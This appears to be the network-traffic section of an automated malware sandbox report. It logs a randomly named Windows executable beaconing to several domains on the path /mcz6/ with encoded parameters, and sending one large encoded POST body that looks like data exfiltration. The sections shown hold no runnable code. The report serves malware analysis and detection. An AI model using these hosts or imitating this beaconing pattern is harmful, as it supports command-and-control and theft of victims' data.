Jun 6, 2024 13:28:15.076375961 CEST	579	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2E3ZmE5OGUtODg1Ni00ZTdmLWJjNzMtZjIzYzYzMjBhZjc2IiwicGFnZV90aW1lIjoxNzE3NjczMj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49784	199.59.243.225	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:16.966166019 CEST	483	OUT	GET /mcz6/?l65lvjLx=qn3zkYHztMKe8mzud8vq3qgzcmJ7Jd4FLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOPCWB0khZATxvEtVM+0yJiG12ulMvj5DktkI=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.zwervertjes.be Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:28:17.588023901 CEST	1236	IN	HTTP/1.1 200 OK date: Thu, 06 Jun 2024 11:28:16 GMT content-type: text/html; charset=utf-8 content-length: 1486 x-request-id: b037babd-4db9-4200-a18f-02f216a8b955 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vfZk1nuDXdk00Asjq5JQRoE11mxSGT/U4cuwnxFOkru72UZ+tHBFA15cUiWWTLoSZWr4eU+CG6sNEzDpXashUw== set-cookie: parking_session=b037babd-4db9-4200-a18f-02f216a8b955; expires=Thu, 06 Jun 2024 11:43:17 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 66 5a 6b 31 6e 75 44 58 64 6b 30 30 41 73 6a 71 35 4a 51 52 6f 45 31 31 6d 78 53 47 54 2f 55 34 63 75 77 6e 78 46 4f 6b 72 75 37 32 55 5a 2b 74 48 42 46 41 31 35 63 55 69 57 57 54 4c 6f 53 5a 57 72 34 65 55 2b 43 47 36 73 4e 45 7a 44 70 58 61 73 68 55 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vfZk1nuDXdk00Asjq5JQRoE11mxSGT/U4cuwnxFOkru72UZ+tHBFA15cUiWWTLoSZWr4eU+CG6sNEzDpXashUw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jun 6, 2024 13:28:17.588047981 CEST	939	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjAzN2JhYmQtNGRiOS00MjAwLWExOGYtMDJmMjE2YThiOTU1IiwicGFnZV90aW1lIjoxNzE3NjczMj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49785	172.65.176.239	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:41.842824936 CEST	479	OUT	GET /mcz6/?l65lvjLx=D5+pF2/O5onkRgs/QJm4Uknwa72XtjRGMQdzYj/9XZpkwzi9ddj0crwo6H79wSPqAuXYaDgjxYH65NOwo1DiSXtozRCrs8BT1aTzU0SzNo1URyRzwyLi3Bw=&Znv8F=zltpR6V05ztTbh HTTP/1.1 Host: www.dty377.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Jun 6, 2024 13:28:42.601919889 CEST	1236	IN	HTTP/1.1 410 Gone Server: WAF Date: Thu, 06 Jun 2024 11:28:42 GMT Transfer-Encoding: chunked Connection: close Set-Cookie: http_waf_cookie=da75f269-5695-479b534bddf69b05595b7d42d3855269f054; Expires=1717680522; Path=/; HttpOnly Via: 1.1 google X-Request-Id: 25364d5fe29fd90826571bf96a18b5a9 Data Raw: 66 37 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e e9 98 bf e9 87 8c e4 ba 91 20 57 65 62 e5 ba 94 e7 94 a8 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 77 [TRUNCATED] Data Ascii: f7b<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Web</title> <style rel="stylesheet"> body { font-size: 14px; color: #333; font-weight: 400; padding: 100px 0px 0px; } .wrapper { width: 850px; margin: 0 auto; } .top-wrapper { padding: 35px 30px 12px; } .top-content-right { padding-top: 20px; } .select-content { display: flex; justify-content: end; } #selectLang { color: rgb(250 100 0) !important; border: 1px solid rgb(250 100 0); } .bottom-wrapper { padding: 0 20px 0 40px; } .bottom-content-one { margin: 30px 0px; } .bottom-content-two { border-top: 1px solid #ededed; p
Jun 6, 2024 13:28:42.601975918 CEST	1236	IN	Data Raw: 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 74 68 65 6d 65 2d 63 6f 6c 6f 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 36 61 30 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 67 72 65 79 Data Ascii: adding-top: 30px; } .theme-color { color: #ff6a00; } .grey-color1 { color: #999; } .grey-color2 { color: #666; } .background-color { background-color: #fa640008; } .font-weig
Jun 6, 2024 13:28:42.602020025 CEST	1236	IN	Data Raw: 47 53 51 68 38 65 6e 33 75 2b 38 31 30 38 4c 6c 77 34 72 2f 4d 36 72 2f 4d 36 72 2f 4d 36 72 33 4b 72 73 63 70 61 47 6e 55 54 61 70 57 30 4c 66 6e 33 30 31 75 47 74 39 35 61 52 54 48 71 78 5a 6d 48 2f 36 2f 5a 70 42 64 5a 6a 56 51 59 76 77 43 2f Data Ascii: GSQh8en3u+8108Llw4r/M6r/M6r/M6r3KrscpaGnUTapW0Lfn301uGt95aRTHqxZmH/6/ZpBdZjVQYvwC/GOHwbiXmlXAu/+7mQpoV/0KEm19jJf9J/K3FpN6E99paeTUJu7bYAXST2a5BCTT6Km81aoFZktfUZF28x0ar1Wy16gO+0dSzlUYzittomSt5xMFr+EuDOWfYhrEy6FByoWpJvRmDjS+wIuzwt8+11OyEFbNDw1pdx
Jun 6, 2024 13:28:42.602123976 CEST	563	IN	Data Raw: 48 31 30 4d 4e 41 35 45 35 79 6a 61 4c 41 68 38 78 35 78 46 76 79 51 76 71 75 42 75 65 6f 6c 6a 52 58 6c 4d 33 66 55 6b 2f 4f 44 72 56 2b 68 6f 36 47 50 68 6f 6d 41 79 4f 32 30 51 6a 64 70 50 4f 55 66 4c 36 6e 32 30 4d 74 4d 70 66 4d 42 57 71 71 Data Ascii: H10MNA5E5yjaLAh8x5xFvyQvquBueoljRXlM3fUk/ODrV+ho6GPhomAyO20QjdpPOUfL6n20MtMpfMBWqqkTuInQOX7P/JqNhn8LF4nhm5jnQS11XLyEqLjQvxFToHnLIiBy7o/U4yKiLdQ5qfewwdcPcL5vNti6CnTUUNsnNLnXEF30IvUi0cW0ZJ7LIRDeXwnzcX9bQ5T+tElM6VanFkPj+k3s/Qnfm+j2RzFwUrH/ZYMf1UQ
Jun 6, 2024 13:28:42.602158070 CEST	1236	IN	Data Raw: 31 62 33 32 0d 0a 64 4f 63 2f 56 4f 58 54 2f 64 64 58 35 75 76 70 35 58 64 57 69 34 65 65 47 64 61 37 7a 63 7a 2f 58 31 72 6d 31 74 6a 70 66 57 7a 38 50 65 32 68 6e 59 2f 57 31 71 61 2f 7a 69 43 76 57 43 72 6c 47 62 6a 46 72 7a 4c 6d 75 6e 39 65 Data Ascii: 1b32dOc/VOXT/ddX5uvp5XdWi4eeGda7zcz/X1rm1tjpfWz8Pe2hnY/W1qa/ziCvWCrlGbjFrzLmun9eLc418bqypzmvL+Vutc2NtdW6trc7X1s+tddW5ubY6r7W3vKV+Xuse+pbmlqp0fuPk+nr6edv3f6xc55Vw/iffP1rL3GJ/5/t+1TqvpofeLIp8ZXPoD77/03rm8x+KrtCV+flNiXzfXbM59IHvfwlf7/s/uZX5eVmc
Jun 6, 2024 13:28:42.602194071 CEST	1236	IN	Data Raw: 53 48 4b 73 2f 47 54 4b 44 66 32 78 50 56 49 4c 63 43 35 5a 57 58 63 38 4b 66 67 48 50 6f 67 6f 4a 79 61 36 4b 65 63 7a 36 63 52 6f 54 2b 52 65 34 74 49 64 2b 42 39 72 6c 6f 7a 55 56 64 6b 75 54 53 72 38 4a 59 48 63 6e 32 79 6e 52 50 79 61 52 42 Data Ascii: SHKs/GTKDf2xPVILcC5ZWXc8KfgHPogoJya6Kecz6cRoT+Re4tId+B9rlozUVdkuTSr8JYHcn2ynRPyaRBxGblNzuIyROBWcO7Z+Cn+ED+LcG7l6dwqqnO5TxRZoQH4W6gU5DysQC5zD9v2NvAaTda5kXZvi6I99DLHFt6aU3J+CzlnNQBoolvQ7sGnuYf4YYRzakWtCnLLpclE4Yr+NObnQLhL4HEJSuDwNrzEw3Xpotj3rRB6
Jun 6, 2024 13:28:42.602416039 CEST	1236	IN	Data Raw: 74 76 6d 67 79 79 6c 63 4a 34 38 4d 6c 72 65 74 53 33 32 44 58 6b 71 73 51 38 71 44 30 2f 45 6f 52 32 35 45 6a 68 58 36 4c 79 63 61 31 76 73 2f 64 50 67 5a 4f 4c 2f 66 52 37 67 68 68 35 61 75 42 4e 5a 79 62 76 2b 6c 6e 6c 74 69 32 64 76 37 79 4c Data Ascii: tvmgyylcJ48MlretS32DXkqsQ8qD0/EoR25EjhX6Lyca1vs/dPgZOL/fR7ghh5auBNZybv+lnlti2dv7yL0o4euHT/mjDtAhXVehZ8zv4J3uJ4o9j3oocU5NxNbulVcHzr3GnJfrrgrNs/yvhY0V5Sl8wTn1d5jwWWZV6HzKq+a5z3/ec43O/kPHc6ru8cCHtfy5jjvaO5GJ1Lu2V7vr+BcdyN9M5dzs8oVmtT5Fe1DAHOcN872
Jun 6, 2024 13:28:42.602449894 CEST	1236	IN	Data Raw: 69 6b 32 59 79 2f 79 67 4d 78 5a 4d 6f 71 79 78 6a 34 58 4b 43 78 32 79 76 34 33 4b 34 61 36 69 59 35 30 71 42 61 4d 68 4b 52 63 61 6c 50 51 42 74 46 73 56 45 77 62 7a 6b 64 2b 42 57 42 42 4c 6a 78 70 72 41 6f 54 72 69 62 4d 62 31 42 34 72 33 47 Data Ascii: ik2Yy/ygMxZMoqyxj4XKCx2yv43K4a6iY50qBaMhKRcalPQBtFsVEwbzkd+BWBBLjxprAoTribMb1B4r3GbbQVv4kZ/UeTWVVXaBt5tcMY4fdOVW0YPlC+/BrgXKmsjp0U+xizGJmNLTqN7gWu+9YyCSq1gL8453Mdn5N+V0zySm9KxqMC+w1KPSSetR4ch46xpek4Wz2evlvKsK4Cs7ILcdbWjqVTY64QLmr0pBWwPcvY/yK3s
Jun 6, 2024 13:28:42.602484941 CEST	896	IN	Data Raw: 72 63 69 74 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 79 75 6e 64 75 6e 2e 63 6f 6e 73 6f 6c 65 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 3f 70 3d 77 61 66 23 2f 77 61 66 2f 63 6e 2f 64 61 73 68 62 6f 61 72 64 2f 69 6e 64 65 78 22 0a 20 20 Data Ascii: rciton" href="https://yundun.console.aliyun.com/?p=waf#/waf/cn/dashboard/index" target="_blank" id="waf"></a> </div> </div> </div></body><script> var innerHtmlConfig = { "en": { "produceTitle": "Alibaba Clou
Jun 6, 2024 13:28:42.602617979 CEST	1135	IN	Data Raw: 74 6c 65 22 3a 20 22 e9 98 bf e9 87 8c e4 ba 91 57 65 62 e5 ba 94 e7 94 a8 e9 98 b2 e7 81 ab e5 a2 99 20 28 57 41 46 29 22 2c 0a 20 20 20 20 20 20 22 65 72 72 6f 72 43 6f 64 65 54 69 74 6c 65 22 3a 20 22 e7 bd 91 e7 ab 99 e6 9a 82 e6 97 b6 e6 97 Data Ascii: tle": "Web (WAF)", "errorCodeTitle": "...", "errorCodeInfo": "Web", "visitRole": "",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49786	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:47.623379946 CEST	744	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 54 37 75 44 41 77 56 54 58 31 58 64 76 64 34 44 32 46 4c 56 56 41 6e 75 6a 79 34 73 6d 37 4d 36 64 6d 77 54 65 36 2b 34 6c 30 59 68 58 38 30 5a 36 56 57 30 30 35 73 2b 39 50 54 79 46 75 68 50 5a 4e 6c 61 4e 41 4f 6a 38 49 66 44 41 79 53 76 70 2b 50 36 65 43 63 53 70 4a 63 50 4e 39 51 56 2b 51 47 58 6b 6f 55 64 78 2b 6d 38 31 38 36 46 72 72 66 64 72 61 30 50 53 49 38 52 52 6e 76 38 36 42 6d 34 35 65 2b 4c 36 78 78 77 48 68 45 57 74 65 4d 74 4c 48 6a 48 6b 48 70 72 6a 31 62 50 56 51 50 5a 56 58 75 61 73 4c 36 52 43 61 67 31 51 41 41 61 42 77 3d 3d Data Ascii: l65lvjLx=ur4hURH6HkX7T7uDAwVTX1Xdvd4D2FLVVAnujy4sm7M6dmwTe6+4l0YhX80Z6VW005s+9PTyFuhPZNlaNAOj8IfDAySvp+P6eCcSpJcPN9QV+QGXkoUdx+m8186Frrfdra0PSI8RRnv86Bm45e+L6xxwHhEWteMtLHjHkHprj1bPVQPZVXuasL6RCag1QAAaBw==
Jun 6, 2024 13:28:48.293901920 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:28:48 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49787	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:50.157424927 CEST	764	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 49 34 36 64 48 73 54 66 37 2b 34 6d 30 59 68 50 4d 30 63 6e 46 57 76 30 35 51 32 39 4f 76 79 46 75 31 50 5a 4a 68 61 4e 33 36 69 2b 59 66 4e 56 69 53 2b 30 4f 50 36 65 43 63 53 70 4a 49 31 4e 39 34 56 2b 67 57 58 6c 4a 55 65 76 75 6d 2f 79 38 36 46 76 72 66 52 72 61 30 39 53 4b 5a 30 52 6c 6e 38 36 41 57 34 2b 50 2b 45 6a 42 77 37 44 68 46 47 6a 63 78 4a 52 6e 61 49 6c 55 4a 6e 71 47 32 73 51 57 65 44 45 6d 50 4e 2b 4c 65 69 66 64 70 42 64 44 39 54 61 34 6e 63 4c 47 74 39 69 65 78 64 5a 6e 2b 52 38 4b 78 71 53 59 34 3d Data Ascii: l65lvjLx=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmI46dHsTf7+4m0YhPM0cnFWv05Q29OvyFu1PZJhaN36i+YfNViS+0OP6eCcSpJI1N94V+gWXlJUevum/y86FvrfRra09SKZ0Rln86AW4+P+EjBw7DhFGjcxJRnaIlUJnqG2sQWeDEmPN+LeifdpBdD9Ta4ncLGt9iexdZn+R8KxqSY4=
Jun 6, 2024 13:28:50.810741901 CEST	479	IN	HTTP/1.1 404 Not Found Date: Thu, 06 Jun 2024 11:28:50 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49788	162.241.216.140	80	4600	C:\Program Files (x86)\VhpozkqFDjnjzKYALFYDYooMXaXPVXDehSdouzyBkGUMaZlRvCRBBcUpEnSRqh\FCJpElfgCpDtTJPmdGdlIYAgNj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 6, 2024 13:28:52.685444117 CEST	10846	OUT	POST /mcz6/ HTTP/1.1 Host: www.lenslaser.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.lenslaser.com Referer: http://www.lenslaser.com/mcz6/ Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 6c 36 35 6c 76 6a 4c 78 3d 75 72 34 68 55 52 48 36 48 6b 58 37 53 62 2b 44 44 54 39 54 56 56 58 65 6a 39 34 44 2f 6c 4c 52 56 41 62 75 6a 32 4a 70 6d 4a 41 36 63 31 49 54 65 63 69 34 6e 30 59 68 52 38 30 64 6e 46 58 2f 30 35 49 79 39 4f 6a 39 46 73 4e 50 62 71 70 61 4c 44 6d 69 33 59 66 4e 4e 53 54 35 70 2b 50 4b 65 43 4d 57 70 4a 59 31 4e 39 34 56 2b 6d 53 58 73 34 55 65 74 75 6d 38 31 38 36 4a 72 72 66 31 72 61 38 74 53 4b 4d 42 57 57 2f 38 30 41 47 34 38 39 6d 45 38 78 77 35 4f 42 45 44 6a 63 39 57 52 6e 47 71 6c 56 73 49 71 46 71 73 64 41 6d 66 52 6e 57 57 38 4b 79 39 44 74 4a 62 56 51 73 56 56 35 76 43 44 6d 30 6e 30 74 56 78 55 6c 6e 6e 67 61 42 72 50 73 44 53 68 48 5a 36 77 38 67 61 44 4d 4c 4a 41 2b 4c 32 31 76 56 57 77 6e 44 46 75 4a 50 49 30 4d 6d 45 35 35 64 44 6a 48 38 6b 49 70 53 38 7a 52 56 41 75 6a 42 2f 58 57 61 54 35 5a 2b 47 46 74 62 66 4a 31 59 76 66 47 4e 39 33 69 76 71 61 66 6e 59 4d 51 56 4e 4b 43 65 45 7a 72 6f 4f 75 33 34 35 72 49 37 44 78 6c 5a 49 66 31 37 73 56 72 76 2f 2f [TRUNCATED] Data Ascii: l65lvjLx=ur4hURH6HkX7Sb+DDT9TVVXej94D/lLRVAbuj2JpmJA6c1ITeci4n0YhR80dnFX/05Iy9Oj9FsNPbqpaLDmi3YfNNST5p+PKeCMWpJY1N94V+mSXs4Uetum8186Jrrf1ra8tSKMBWW/80AG489mE8xw5OBEDjc9WRnGqlVsIqFqsdAmfRnWW8Ky9DtJbVQsVV5vCDm0n0tVxUlnngaBrPsDShHZ6w8gaDMLJA+L21vVWwnDFuJPI0MmE55dDjH8kIpS8zRVAujB/XWaT5Z+GFtbfJ1YvfGN93ivqafnYMQVNKCeEzroOu345rI7DxlZIf17sVrv//6nWGO8Kx0ipKCYQyZJab/evwhRiIseNXwa05Vzbl/FOXpdiImkHALPA0mbmodT39B82ybKS0v/ZxcyB38b7sWbHUPRdiPUCKCGMUjcafEEjlndBoVHy/svcIzCiQWckYbwwiKTnU0P6Dws9bRTzGawVTuTFxKrkKHi3kpUAsjp9Tw0B4pMwPiKrkubL2T7JdGx37gQKJUjMmqfPulAYYqggN6PZWu2RH+mY0351E4x3gHSH/yPwJn3gV31T6yiVLgcTmZfcoLzIOk5avnbPZlZYfm9Bv7sE8rvNKgjgNvgxW2RKRndrdCmNv/AeZHz8qkrG8KrTTnrlqJaYlBVEf6xX75iGm4levZ+13QkoVYN5x71eQzkXWtZUlt2tAbN0VVTf0FT9jU/YEebAFybA8wkdhx4AUyMjX4Adn1ZkFAcoJ5WWxPjR2+r20Wy7LPPa2EHk86RGHNEsEVIMwtsbck1i7al4d1gcAUo1OUDALwpEw1KDpJa8Qy/2TJJok25pUSwrNR4nLVl7mIlk87j2tudjl4c/XKh16GRU